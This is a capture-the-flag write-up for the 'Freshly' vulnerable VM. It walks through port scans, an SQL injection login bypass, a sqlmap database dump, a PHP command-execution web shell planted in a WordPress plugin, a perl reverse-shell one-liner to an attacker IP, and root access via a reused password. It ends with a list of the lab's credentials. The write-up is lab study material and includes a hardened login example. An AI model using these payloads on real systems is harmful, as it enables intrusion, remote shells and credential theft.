TopHatSec: Freshly – Write Up

Just freshly.

Nmap result

root@kali:~# nmap -sC -sV 192.168.56.103

Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-21 07:00 WIB
Nmap scan report for 192.168.56.103
Host is up (0.0016s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn’t have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn’t have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after:  2025-02-14T03:30:05+00:00
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.74 seconds

When I look at port 80 there is only a gif here.

On ports 8080 and 443.

But the “Nice Find!…Proceed” link leads to the directory “wordpress/”.

WordPress has vulnerabilities in the Cart66 Lite <= 1.5.3 plugin (SQL injection), the ProPlayer 4.7.9.1 plugin (SQL injection) and Google Analytics by Yoast 5.3.2 (Cross-Site Scripting, XSS); I found these vulnerabilities with wpscan.

[!] Title: Cart66 Lite <= 1.5.3 – SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7737
Reference: https://research.g0blin.co.uk/g0blin-00022/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4

[!] Title: Google Analytics by Yoast 5.3.2 – Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7838
Reference: http://packetstormsecurity.com/files/130716/
Reference: http://osvdb.org/119334

[!] Title: ProPlayer 4.7.9.1 – SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/6912
Reference: http://osvdb.org/93564
Reference: http://www.exploit-db.com/exploits/25605/

But there is something more interesting after I use nikto to scan port 80.

Nikto result

root@kali:~# nikto -h 192.168.56.103
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.103
+ Target Hostname: 192.168.56.103
+ Target Port: 80
+ Start Time: 2015-04-22 06:32:30 (GMT7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6744 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2015-04-22 06:33:48 (GMT7) (78 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Then I look at login.php on port 80: there is a login page that returns “0” if the login is false and “1” if it is true. How to test the login page?

Login with user “admin” and password “admin”.

And I try to bypass authentication with the classic SQL injection payload “any' or 1=1;#”; the result: the user and password parameters are both injectable.

Login with user “any' or 1=1;#” and any password.

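
To show why the payload above succeeds and how the same check is written safely, here is an added example (not the VM's real login.php and not code from the original post): a minimal login check that returns “0”/“1”, in its injectable form beside a hardened form using PDO prepared statements and password_verify(). The table name users, the columns user, password and password_hash, and the DSN and credentials are assumptions.

```php
<?php
// Added example (not the VM's real login.php). Table name `users` and the
// columns `user`, `password`, `password_hash` are assumptions.

// Vulnerable form: user input is concatenated into the SQL text. A username of
//   any' or 1=1;#
// closes the string, makes the WHERE clause always true and turns the rest of
// the query (including the password check) into a MySQL # comment, so the
// function returns "1" with any password.
function login_vulnerable(PDO $db, string $user, string $pass): string
{
    $sql = "SELECT COUNT(*) FROM users WHERE user='$user' AND password='$pass'";
    $count = (int) $db->query($sql)->fetchColumn();
    return $count > 0 ? '1' : '0';
}

// Hardened form: the username travels as a bound parameter, never as SQL text,
// and the password is checked against a password_hash() digest in PHP instead
// of being compared inside the query. The same payload is now just an unknown
// username and yields "0".
function login_hardened(PDO $db, string $user, string $pass): string
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE user = ? LIMIT 1');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();          // false when no row matched
    return ($hash !== false && password_verify($pass, $hash)) ? '1' : '0';
}

// Wiring (assumed DSN/credentials): native prepares, exceptions on SQL errors
// so a malformed query fails loudly instead of being silently treated as "0".
$db = new PDO('mysql:host=127.0.0.1;dbname=app', 'app_user', 'app_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

if (isset($_POST['user'], $_POST['password'])) {
    echo login_hardened($db, $_POST['user'], $_POST['password']);
}
```
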
Now exploit this vulnerability with sqlmap.

I'm interested in the database wordpress8080, so I dump that database.

Reverse shell

Log into wp-admin and edit the PHP code of one of the existing plugins.

My code

<html>
<form name="cmd" action="" method="post">
$ <input type="text" name="cmd">
<input type="submit" value="submit" name="submit">
</form>
<?php
// When the form is submitted, run the posted command and echo its output.
if (isset($_POST['submit'])) {
    $target = $_REQUEST['cmd'];
    echo shell_exec($target);
}
?>
</html>

Make a reverse shell with perl.

perl -e 'use Socket;$i="192.168.56.102";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There is a mistake in the permissions: /etc/shadow is 755 (-rwxr-xr-x).

But I don't need to crack this shadow file to get root access; I just find the MySQL root password and try to run the “su root” command with it.

Move to an interactive shell with python and run the “su root” command.

Appendix

WordPress password

admin : SuperSecretPassword

Login.php password

candyshop : password

Sir : PopRocks

MySQL password

root : SuperSecretPassword

User password

root : SuperSecretPassword

user : SuperSecretPassword

candycane : password
